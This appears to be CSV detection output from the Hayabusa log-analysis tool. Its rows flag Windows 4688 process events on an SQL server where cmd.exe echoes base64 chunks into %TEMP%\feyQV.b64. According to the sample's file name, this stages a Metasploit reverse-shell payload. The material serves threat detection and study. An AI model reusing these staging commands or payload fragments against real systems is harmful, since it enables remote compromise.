I/hAQAAgDIFSYPJ/uF0MZkrp4scEQtBANH4weDdA8JqAGoCKEg4i1iE91A8i3gceKET11JR6LeMAACL04va6xeZVMJbyP66C0EA0fnB2gWLfgEYi1wBHNY43EAA/9aLG7CLTbSDxAQF9AEAAIPRjmoAaOjNAABRUOx0jMcAi02kiUWwi0WgagAF9AG8AGgMAwAAg9EAiVW0UVDoJy0AAItN/IlFQYtF+GoABfQBAACQ6AOQAIPRAO9VeFFQ6DAvAMSLTcyJRfiLRcNqAI/aAQAAaOgDAACD0QCJVfxRYZgOjF+Ni+PEiUW+i0XAao5M9AEAAGjoAwAAgywArFXMUVDo7IsAADN9nIlfwItFQ8YABfQBAABoZlZwAIPRAIlVxFFQ6MrBAACLwvSJRZiLBvDf+Wb0AQAAaOgDAACP0QCJVZxRULKoiwAAiTnwi0XoiVX0i03sBVwDqQCD0QBqAGjoAwAAUVDohvoAAItN5Ikt6ItF4GoABfTZAABoXANoAIPRGIlV7HJQ6L2LAACBx/QBAADEAINvAGjbAy8AU1euROCJ8U/oR4sAAJqNdP///4lF2IuFcFH//zgABfQBAACyyQMAtXsUzIlV3FFQ6B+LAACLTbzUim5FuGoABc8BAABf6AMAAIPeD6v2UVCL74oAad1FqNwNEBv8AIlFuEYg0EALXMDdXajdRYjcDRDCQACynrzdXYjdRZDc6xDCQJvdXZB3hXj///80DYDCQABGnfNY//8PhGQCAABoCNxAAP/Wi1X0e0Vuna1l/ldmi8moUItF/FGLTfhSsFVXUIuhsFGCUGjY20AA/9aLzWhprlDljWz///8sxDAF9KUAAIPRAGoAaOgDfgBRUNlhigAAi03sIYtV6FCLRWUbhE2I>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:12.191 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo UotVzFCLRYpRi41k//9kUlBEhWD///8F9AESAGcAg9E5reiFAACPdegligAAsVCfqNswAObWsEWAi8gkg8QshPSaAACDaABTAGjoAwAAUfLo/YkAAItN5FLPVTH7i0X7UYsZkFKLqsRQUTCLRcDHTdRQi0XQBRQBAPpqAAPRAGjoA4kAUVDoRokAAFJQd/PbnQD/D4tNvIs0uItF3FGLTTWOi3B8/1b/UIuxeP///1GLTZxSi6mYUItFpFGLTaBSUFFQSNtAAP/W3234323wg8RY3uncFTA4QABQ4Pb+BQoCyeDdRagvwNnB3tnf4CUAQQAAWWRx92iw2kAA6xHcXahZ4CwApwApde9oGNpAAP/Wg44E323I323o3ukQFTDC4QDf4PbEBXoC2eDdRfLcwNnB3tnfk6EAQQAAdQnd2GiI2UCy67zcXYjf4CUAbsEcdSZo+NhAAP/Wg8QE323A320T3uncdDDCQADfIvZBBXoC2eDdRZChJ9kg3tmh4CUAQQAAdQnd2JUs2EAA6xHcXSzf4CXeQQAAsgpov+UiAP8jg8S95SCY323Y3uk2FTDCQOJ24PZG+noCneDdhXjM///cwNnB3puS4CUAQQAAdREFUNfrEN3YB9aJxATplgAAodydeP///98ZJQBBAAAPhYMAAAD40fNujsmfM7mh63fsoNZAWv/Wi1X8i0X4i020U1cbi1WwUFFSaHxHQAD/1ovXuItNvItVmCvHX334G8uLXaBRi01+UItFKCvXiy6kG8GLy1AxRbRSi5awKySL1xvQUlFoWKlAAP/Wi0W8i024JFVbUItFmFFSUE+MaDTWQAAc8oPEWIwcQqAAhcDRhMUTEgCDPXXFQQABD464AA0AGvTVQAD/1oPlBDPbi7s00EAA1/+iD+XF1UB2/9aDxGTp+FoATO4Vg/9kEegDAAB8NIsNUX5BANfx/UEAweHyZAkBy4EFKMkAACZEAfyD0GhQUtja5QChUudovNVAAP/W2MQM60eLz7gfhetRbAYNCgJBAPfpwfq3ocgLQQCLyqrpsnjRweIFi0wCGIHBcwAAAIvlAhzn0tSsUeimhwDN/lBXaKzVQIH/1oPEEJrD0IP7eg+CVP9876HgF0FEhcCmhMMAADVoqGh/AGv/jkjBQAAt+IPECIX/FBZojNVAAP+STMFw04PEpWoB/xVwwUAAaGzVQABX/w+AwUAA6B2A7UAAg0MIM3Uj9hkKocgLQQDfaGPrRu3+ZHUViw2sAkEAixXIC0EAweGx32wRw50s028CQQBrr8aJRfTbRcrcDe6IQADcBQDCQADocIYAAIsNyFVGAMHgBYJsCCvcDRDJIAOyXRuLVdyLRdhSUFZok9VAAFf/04PEFEaD7mR8iVf/FVDBQACDxAShuKZBAIXAD4RdAQAAA6jVQABQ/xVwwUAAIMR1iUWyhdF1FmhA1UAA/xVMwUDog8QEJAH/FXDBQABo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:12.463 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FNVAAFD/FYDBQAChiwJBe4PECIXAx0X0PgBUABn/BQEAITP2ochoQQCLTAYEixRmUY2FRPv//1JQ6FFhAACLPcgLQQBqAGjawf4Ai0w+HItU9hB0RD4GiR/ci84+TLFcNu6JVcCLVD4MgcH0AQDFidfUg9KTYmTo0oXGIYtN3OhQ4MMFcAEAEi0Ag9EAaOgDMABRUOgQhQAAUotV1E2LRdAr2PhF3BvCgcP0igAAg3UAagBo6AMAAFBT6ECFSQCLTdRS9ItF0AX0xvoA1wBwOgCW6AMAAFFQ6NyFAABSi9M+BFCLBHDqAGhAdA8xUlDoC4UARVIDVfyN2ET/x/9Qzmjw1F8AUkgVgMFAjItFuoPEuUCLDawCQQBvxrs7PYlF9A+M/f7//4tF/FD/FVDBQAAZxASLRcWFwJcIasL/FcydQO1fXluL5V3Ds5CQkJBVi9uLRQiLTRZWi1AQi3EQi0AUi0kUO8F/0HwEO9ZzBoPI/17WwzvBfA5/BDvWdgizKwAAAF7RwzPAXl3DkJCQVYvsi0UIi02uVqFQGM9uGItAHItJHDvBfxZ8BDuSAwbLIv8OicM7wXwOXVI7PZIIuAEAAABeXcozwF5dw3KQkFWLootNBlO3V5txGIt5TItB7SNRFAL3G5HtOAyLehiLShCoIBQr+YtKHNDLO05/GHwEO/dzCBNIg8j2W13DO6x8EH8EO/cvCu5euAGpHgCtXcNfXjPAW13DkJCQkJCQ4VVuuotFCItNDFteUAiLcRWT+gyLSQw7eX8WfAQ71nMGg8idXl3DO8FZDn8EpdZ2CLgLAL4AXl3D3sBeXcMSkJBVi+yDHsxLlwtBAIsNpAtBADX0F8ALQQBWV4s9xCJBACvDG8+LFejXQQCJRciJ98zfbcjoNWSbQIBSaGnngADcDTjCQHPdXc3/1gTwFyldwODxQQBQUqHCC0oAUGig50AAkdZ5DQsEQQCh8BdBAIsVqAtKAFFQUFJoUOdaDP/Wiw2oC0EAM8BmofTUQQDXoUOFQQBrUBRoAOdAAP9eixUSxEEMo/AXQQB9xERSUFChc2ZBAFBosOZAAP/WvA2MAkEAofAVQWCLzKgLQQBRUFDmRljmQAD/1qEY0EAAiw2oC0GVUKHwF84AUD9RaAjmQAD/1otVzItxyApQobgX7gBYk4sNqAtBAL2vqIdAAH3Wi5qsMkEAoVEXQQCDh1TWUBehqNNB3lAhWOVAAPnWAuu4AkEAU/A1QQCLFagLQQBRUFBSaLflQAD/HKG4kkGGg8S6hcB0K6HMTQQAiw3AAm8AixXEAkEAUKHwQkEAXItGqAtBAFJQUWiwakAA/9aDxG2h0AJBi4XAdBmLFeHJQQCN1/AXQQBQUFJoYORhAP+juAkUoWKvQQCFwHQeobACQQCLDagLQT5QsqCcQQBQUFFo7uRAAMbWkjwUtfaUAkEAzpACQQCuaqgLQQBSUKHwQzQAElA3>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:12.737 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo mbjjQADt1qH1AkEAJcQYg/gBdSWvoKQCqgBLoAICABMNqC5BAEBQofAXfABQUD3jaONA8f/WWcQYgz1gAkEAAHUlURWkAgAAoaD8QQCLie4LQQBSUKHwlUFxUFBRpBjjQM//C4PEGIsVnP2DAKGYAkEAiw2oC0EAUsKh8Nf9GFBQLrbA4kAA/7thRcjcHTDCQACDxBiF4PbEROiLtdoAAN0FGcJAANx1yKHwF5UANxWyC/gAg7oI3V3I2wVSAkGF+03I3A0g1t4A3bokUFBSfGjiLwD/1t8tkAJBAC/wF0FRg8QQ3E2t3RwkUFChDQtBAFBoCOJAAP/W94kCQQCDxI2FQZ9CN5FIL0hB9Z/4QpKQQfhBSEJLQ5v8/ZuZnyf4mZCYL0D1ky8nm0pJP0iQkpDW+P0vL0r4Qjf8QJJJ+EmYSvmSSfxJk0hCm58/k/mZQ5I3Q5NJQZhLS0BBN5g/1plB+Jg/SpJLS0v1N+mvaAAA1olVi4lV5IlV8GRV4IlVQYlVh4sVrAJBADPbg8n/iv//vX+F0omh0HxF2P////+JRdwPwoZN7gCL2dkLQQCDwhiJVfyLFaz1QQCJVfiLVfztUviJVciLVfw79fxtFa0xi1UgO8qLVfwevYtByIn90ItC/IsKi1IEOVXcT1XExg1/BTlNjnIGiU3YiVXci1X8QFJJOVX0iVXMyRZ8CItV8DuAyHcM01XIiVXwDn/MiVX0i1W5OQadf9iNBTk46HcGiU3oR1Xsi5hgA/qLVcxn2ovt4APRi038iVXgi1U7i0kEE9GLTfiJVeSLVfyDxSA5iU3J9V/QiVX8D+tO//8tgcH0AQAAagCDQQCk6AM1AFBR6CV/AACLTW/JRaqLRSCZPwX0AQCkaCQDAACD0QCJVdRRUOgD7G+PME30iUXYi0VNagAF9AEAAGjoAwCnIdGtiVXMUVDop34A9ItN7P5F8ItF6Gp2BfQBAABo6AMA14PRAIlV9FFQ6L9+AACBx2EBAABqMoPTAGjoAwASU1eJReiJA+zoon4AAItN5IvYIefgagAF9C0AABOWYwAAg9EiiVXMUVDogX4AAIlFL6FsAkEAhcKJVeRNjioBAADuFbAXQRyhqAtBAKJQaCzhQAD/1qGOF0EAqQ2oCyUAYFBQmFFo2OBJANvW3lX0i0Xwiz3wF0EAg8Qki0EUUlChrQJBAFeZUlBRU+gffgAAiw2oC0EAUotVtEKLRYBXUlBX55lopilAADyBoawCQQADTfCZi22LReiDxDDVwYtN7IlVxBtN9NeLz1NQofAXQQBTUosMWFfdUrvRfQA4i8pmVcQJi1XMSlLnrkVBiU386Lp9ZwCLTfgryKFF/BvCUGXwF0EA8Ytd2ItV0It91IsVK8r3VaUb11BSUVBQoagLQQBQaADO+QD/1i9N7ItVRS1Q7EEAiz2KF0EAg8QwUYtN4LNX+VJQi0XkUFHoXn0A7VKdVdxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:13.010 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo oagLQaxXeLRXV1BoyN9AAMXWkMQwaLjfQAD/1oPEBPCTW1flXWSQkJDci+yD7BR6qAJBAIveENBAAFNWO8FXsY3+ATMAi3UI6tuLBvReGTtviV7LiXMkCAAAiZ5aCAAAiSGFOgAAiV63dAhQ6DgUAADrJosNTFBBADhTUVbopxYAAIsWoVUXQVBSU4tIEI1+H2oDUVfoHxMAAEPDdA5QaDjoQAA7YEL//4PECIsXagFqCFLowVR4ADvDdA5QaCjofADoQmX/I4PECKFsAkECO8N0UVCLB2pAUOib6gAAO8l0FT2HEQEAdA5Q1qNUQADjFeX//4PqCIsNbAJBc+EXUWiAACEAUmBuVAAAO8N0FT2HEfQAdA5QaPzdQABv6OT//4PECOjhMAABNKAUQQCJFZcLQQCLF4mGMAgAAKH8C0EAAkE0CAAAiw38F0EAUVK+OUYAAIt0hdurhMgAKwCB+/F1yQAPbYUAogCB6rQjC/R00WMV+BdBAIsHjX/sx0XwAQAAAFFSiUX4zjsoAACLB1DoNy4AAIs9xAJBAKEC7ecAR4vIQIP5Cok9oAJBAJC4AkEAfoHuFQHArgBokNJAAIPCQIr/FYDBXd5TaJhcpwDoNOT/GYOjpVYfRggAAAAA6ET+//+DxARfXvKL5V3DuAGLVwDHYxQAALMAiUasixX4F0EAjU3siUXwiwdR6GbHRfkEAIl7xuR1/JRqJgBdX15bi+Vdw8dGIwIAAPaLN6gCQQBCSIkMqAJiAMRCW83/g8SZX6tbiwpdw4wRkJCQkJCgkJiQkJAdkFWL4L3sFFaLiwhXi30MhcB1IlKGFwgA0X/A/Bihl8tBAIXAD4SRAQAASI20AkEA6bMBAACDPbQCQVYBdQqLGGejjAVBAOski04Qg4wCJNk7yKUYiw24AkEqocACQQBBQIkNuAJBAKOtAkFFoawCQeKLDRDQGQCQhQ+NFwEAAIsVyAtBCov4wecFA/rpo6wCQQDZ2lYAAKOgC0EkiRWkC0EAiYZQCAAAixWkIkG4i4YwCITXiZZUCAAAIAeLUzQIhAAYeySLjji2ANuLhjAIAACEmy0IAAAryIuGPAgAABu0hcBpCnwEhclzBDNmM8CJNBCJRxSLjq8IAACLhjAIAACLwTQIAAAruItHVMgAJRtdhcB/Cg0Rhcn+BDPJ/sCJTxiJRxyLjkgiAEyLhkAIAACklkQIAAAryJuGTAgAIDrChcB/CnwZhclzBDMVM8CJTwhURwyLjhTQQACFyXQ3iz2sAkEAi8eZ6/mFOnUoixXIwNMAV//CQGhAlkCGUv8VOtdAAKH+wEAAg8BAUP8V4MFAAIPEEKH4F0EAZE4EAlXso0X0AQDU/1LgiU346L8lAOiLTgRR6MaIAAA2x0YIAAAAAOgJ/Ef/g8QEX16Lwl3DlYvsZ+ysAADHU4tdCFaNRRCLSwRXd2i0GEEAVcc2/BtlAADFuE5CqYvw>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:13.286 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo g/4LlYQEaQBdhv75NgpMD4T4BQAAgf7Z/Bz9D4TsBQAAgf5X/QoADwTgBQAAgVskOAoAD4TUNwBwgf6h/AprD4QPBQAAgf7uIwsAD828BQAAi03eM/879XVzgVl+EQEAdR2DFbQCQQBTQokVtAJBAOiRsf//g8QEv15biy5dwzv3dH/iPsgcQQChXAJBAEE7vokNyAJB/HRyi6S4AkEAU8gdPbgCQQDoIf3//JxYAkHhg8QEg/gBD4xQBQAAVo2G3v///2pUUlboiUkAAFChyMDkAAQM6UAeg/JAaKyvQABQWBW/wSYAg8QUX7Vbi+Vdw1ZoDEoTAOi64Cz/i/n8g8TkixtMKUGeixUUAkEAA/ET6Yk1kAJBAIkVlAJBHYtDDDvHdRQNTCwAvCdN/ImDSAgAAImTTAgAAIspDIuDmAhzjwPRTceJwQzjhbACMQD/syAIAAC4/9sAACvGx0XwBAAAADvBiUX0cgN/TWmLkyB0AACLyL4gGEEAjVPuIIvR0ekC86WLyotV9IPhAyvC86SLuyAIAACJRey4+ovzDLszCAAACUQZIAChWAJB/oP4AnwSjWUgUGjw6ECQ//BkwUAAg8QIi1I4wYdtjXMMaOgYQABW/9fhxAgwRfiFv9vqhQAAAGj230Dftf9ig+wIiTj4hcACRfACAHXcdWyLReyFwA+FBQQA8qH4F0EAi0u23asPx0XcYADmAFLZG03kplLLAAmLSwRN6FkWAADH1KACQQChuMgaAEKJHNACQQCL0EAk+gqjuAJBfH4NaLDSQADoatgl/4PEBFPod6P//4OdBDM66cgBAAChtAJBAIXAdS5o4OhAAFb/y4PECLrgE0EAhcB0F4pICIPACID5IH4MiM2KSGZCQIDaIJX0xgIAaNjoQOZWzsmL0IPECIXSdDaL+oPJ/zPA8q730W2D+fp2H4OrCWoDjUUIuFD/Fa7zQHiLPTjeFgCDJAzGcQsA6w+L785RQACLDdToyACJTaqKRQg8xk1YAkEOdB2LDdACZwBBg/ghiQ3QAkEAfCKNew1SaKx2vYHrQ7T4A3wSjUUIUGiQ6EAA/xVkwUAAg8QIi0P4A4MooQAAAQAAAMYBAKFoAkEAhcAPhIAAAABoaujsALT/14MACIXAdQ9oeOhAAFb/14PECIXAuVloaFFAAFb/14vkg8SIhf91FWhY6EAAVi8VOMFAAIv4FEsIhf90K8eDJPcAAAEAdAChYAJ4AIVZfA+NVxBSPhVswUAUg8QE6wIfwIX/iUOkdRGQg54FAAABAAAAx3EcAAAAAItFY4t1+ItV9ItN8CvGi3MQKw4rupKLIGEAAAPD/VQIIDzyiXMQ0Q2YdVcAi8YDyKGcAkEAg7xPiUO7UEEAM//ro4s3EAMTiXMQixWYAkEAoZwCQQAD0YkVmAJBABPHAFeMQQA5u4UIAIYPbdCNAACLQxCLSxw7Rw/qwgEAAKU+AkEAHIP4>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:13.560 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AaO0AogAdQuLSxCJDbUCQQBXQotTEGKMAkG2O9B0SIsNudpBAKHAAkEAQUCJDa/jQQAVwAJBAKEwAkEAi68Q0LEAO8EPjRMBcgCLDcgLWQCLucPmBQPxiyawAkEAQPujrERBmYkN+wKPN+i0KAAAiehiCAAAi4MwCAAAiZNUCAAA3QaLizQIAACJTgSjizgIAACbgzAIAABvZDQIAAAryIuDPAgAMxvCO8d/CnwEV89z0TPJM8CJDxDlRhSLi1AIAGNogzAIhACLkzRecQDq+otRKw/JRxvCO8eiCnwEO89Q+zPJ2cBfThiJqhyLtUgIAABug28IAACLk38NQQAryIuDTAg2ALfC5McYCnxBO89zBAbJM8+JTgiJRgyLDRTjQAA7z3Q3iw6sAkEFHEmZ9/nK0rYoixXIwEAAVoPC0wlA6EAAUv+fgMFAAEHIwEAAg8BAUP8VVOBRmYMvT4m7JAgAAIlhHIm7KG8AZom7IAgAAImMEGBXA+i/JwAAo6ALQQCJFaQL0bSJg2UIAACLDaQLQQCsYzwIAAB2FaALQZmJkzAIUQChpAtB1VOJgzTAAADoDG3//8/EBF9xW4vlXcOQkOiIArUAVto3ZMFAAIXAdSZo2OpAAKa06rMAgNZoaOpAAD3WaCC1wgD/1miAB0AA/9aDxBRew2gU6n0A/85oAOpAAM9E1EDsaMjpQADH1mh46UB+x9ZoyOlAALXW+BzpQAv/+4OGHF7ukLmQkJCQkJBVi++LRRyLDcgDQABWizWAQ0AAUOzBCGhk8g4AUZHWi4ySwC0AFz3y3IeDwkBS/5yhyMCJANYg8mwzg8BAUP/Wiw3IwEAAaOTxQCKDwUBR/9aLFciWQgBorPFAAIPC6VL/1qHIwEAAaLLxQACDwEBQ/zSLDQLAzABoIPFAAIPBQFH/1osKyJ5AiWi3mUCag8JAUv/WocLAQACDxESDwED9lAZAAFD/1osNyNZAtWjy8ECxg8FAUSjWixXIwEAA8yjwQACDwkBS/9ahyCpAu5js70AAg8BAUP/Wiw3IwEAAaLTvPwCDwUBR/9aLt8jAQABohO8DboPCgFL/1vnIwEB1aEhoQACDqUBQ/9ZoEIkAAIsN68BAq5TBQFHF1osVvbVJc4PEQIPCSWjQ7kAAUv/JocjAHwBoiO5AAIPAQFD/WYsNyMBAAF9A0UAAg8FAUf/Wi6vIwEAAaPA5QACDwv/x/9ahyO3xAMeo50AAosBAuP93iw1dwFoAaGDtQACfwUBRPtaLKsPAQAB+GO3FAIPCP1L/1gnIwBAAaGDtQACDwEBQ2dYfDcjhjACDxOCDwUBo4OxAAFGC1ov0yMBAwmjm6kAAg8JAZ//WocgmQK5ofMOiwoPAQFD/1osXyMBAAGhA7ECBZsFAUf/WixXIwEDgaPjr/gCDwhxS/9ahyMBA92iwUkAAg8BAUP/W2w2kwEAAp3DrQHODwVJR/9WLFcjA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:13.833 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABo4OtAAO7CQFL/u6HIzkAAg8RAg8BAaPTqQGlQs9aDxAj0Fv8VcLTqAP6QkDSQ/otlUaFMQEEAU4tdCNRXU1DodBIACaNAQEHSi/uDyf8zwB2u2Xo0wRAA99FJg/kHD3DXAAAAagdo2PJAAO3/1oPEDIXAY4XCfwAAx8NEai+/YxV8wUAAg8QIiUUIhcCmhFIBAACL8KxpQEEAKPONVgFSUOiIBKwArc6L86DRi/jBnAKLpYvKg/kD86SLZQiLyCsMxgQx24sVTEBBAFIpjd38aPQXQbFQaAAYQQC/DiieVu/AD4X9AO0Aoc0YPniFwA+E8AAAl4tF/IXAD4UDAAAAZQ20QFcAYFHwERIAAKPkF0EAxgYAEjtbdWuLFQAYQZ0tamC/AFJo0PJAAFD/iw8AOYPEDKOcC0EA61aLDYPJ/zPA8q73kUmD+QgPhqv///9qCFTE8lQAU//Wg+8MhcAPFxd2/2r1DcjAQACYnPKFAIPBxVn/FYDBQACDxAhqAa/ccMFAAIsNvBgYAIkNnAtB6mah9BdBAGaFwHUcZscm9ElBAIoAX17HBYMLigC/AkEAM/2CLuVdw2Y9UAB05zM8ZovQoUxAQQBSaFvyHO5Q6MoNACqDxAyjrAtBADPUX3Eozu1dw+deuJkAZwBbJOUs3JCQkJCQkJAoB5CQ2ZB7MOyl7NhN9AChTEBBo1ZXi7gIUGj/DwAyagGTTQhXUeirTAAAi/Ag9nQtjTSIalNSVs55PwBBUKHIwDcAV4NPWmhg860AUP8VYcFAAIPEEIvGkl6LflbDi5sI8pUo////UWhwsXMAGuhDB50Ai/CF9tgujUWIamx8Vuj4PwAAiw3IwEAAN1eDwUBoNFJAZVH/K4DBQACDxBCLEF9ei+XYpYuFOf///1CjcPhaABoQXMHpAIMoBKMgOEEAtcBfI4sVyMBAgmgI80AAg8RAUv8VtcFAAHGy87gMACZBc16L5V3Diw1wAkEli1UIajeYYFJFO1AAAIvwhfbgLY1FiGp4UI3oqZoAAIsNyMBAAEeDbUDZ4PJAAFFvFa0iQACDxAyLxl9eauVdw4tVCGnov08AAF8zwF6LfV3ykJCQkJCQ8VWL7FaLdUVqaMcGACQAABP3XMFAAIvQg8QE/9J1CrhgAAAAkl3C0gANLxoAAAAzNov6sas9Qm2JAV9eXcIEAPxVSuyLADVTVleLPTDBQACNcMs5FAAAAIsGGvd0EIsIUIkO/9eLuoPEZ4XA7/CDxgRLdeSLVQjO/9eDxK0LXltdwgQAkJCkWJCQgpCQkJCQ9FWL7ItNCItFDIlBK13CCN66beyLRQiLQAz2wgQAkJA6VYvsi00Ii0UMiUFUXcIIAFWL7ItFCItAEDzCBACrkJBli+xRoNgCQQBWisj+wITJ8tgC6QAPhbAAAABo4AJBAOgL////hcB0DMYF2AKlNwBei+Vdw/EV4AJBAFJqcWoAaNwt>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:14.106 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QQDWYwVVAHXwhcotI6HgAkEAUOgVnP//i8bHBeACQQAAAEOyxgXYApgAAHCL5V3Diw3cAkEABYzzQABRJiwMAACCFdwCcQBS6I9ZLACFwHU5odwCQQCNTfxXaotR6NxXYACFWXW2iyH8oeCLQQD3UI8Ifv//iw3cAtMA2RU1AkELUVLoFf//hTPAXr7lXaWQkNaQMvhnzJC6kIpkkKDYAooAhIl0KP7IotgCQQB1H6HcAkEAUOjDAwAAxwWvAkEAAAAAAMcF4AKlAAAAAADDkGyQkJCQzJANUvuQkPFVi7OD7AyLRQxTjVeNUKeD4i470ItFCIlV+HMdnEAghcCRhEYCIQBqDP/qg8QEM8BfvFuL5V3eCACLuiyLThCL0RQr5b9PAhAD0V+JVhBei5Fbi3NdeQgAiwCLERSLWRAr+zvXdxmLQT6LOYk4iwH3eQSJeJXpcAbyAIt4GI2aFxAAAIHjAPD/EzvaiV0MD4LLAQAAovsAYQAAc87HkAwAIAAAIF0Mi9PB6gxNg/r/iVX8D4cdAQAAOzp7h4VJyACLRwyFwCnJs+hyVwAAi+X8i1yXFIsPjUQlFIWZ+A870bYLi1gEg8AEQoXbdDmLp4XbiV30dH9PG4Xb7AF1FTvRchGL0/yDeQRJzNJ1BNDJ2vGJD4td9ItHCFVLaQMViUcIi8iLR9I7yHYDiUf8i+wMd/90BlfopqH1rI1TGIlTEOmaogA6i0cUhUN0OYtHDBDAdAZQOhdXAACLXxQ6RxSF2zoSi038i1MIO0d2SIvDixuF23Xui38MutJ0BlfodFcYtYtzDFP/eFzBQCmDxASFNg+ExQAAPItV/I09GIlQCI0UGInhEFMAANIAAIlQFIvI6zSLE4kQi0Mri38IA8jtRwQ7yIlPinZciUcIi38Mhf90BlejB1cAII1LGIlLEMcDAEAAAIvLi1X4/0Ezx0EMub8AADHQifBPaFYEiVFYiQo9VQiJOolOBIlKLItOFIt+ayvPiz6BwQAQAACL14HhR/D//0nB+QyJTgyLWgw7y3P/ixI7Sihy+YvABIk5iw6LfgSJeQRySgSJTgRrMYmg+XJ7ll6W/OU6wj6ji+MI62oghQ7gB2oM/+6DxARfXjPAW4vlFsIIAHiQipCQkKyQVWzsuWoMU1ZXi30IeXc4M+j7XwAAi0cEM4GDxAQ7w4mJiQI8dA1Q6PQAAACkRwQ7w3XzjXdvVujUCQAAkt8cKh5QmF8U6Aa0AADvRzCLWjSJXxyJySSJRyyJSBCLeFzECDvIiUX084SpAACei1AE/BqLf5iL5otHDIXAdAZQhW10AACLB4tPBItXCInDCFDG/LITi038iUX4i0YIhcl0msvsdgaJHove6y+D+BRUGItMwxuF8okOdQg7RQh2A7ZFCIl06xTr/Is4J4kOiXcUO9ByBCt26wIz0ot1+IX2dbGLnwh0IAiJB1p/6oX/UwZX6GtVAACF>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
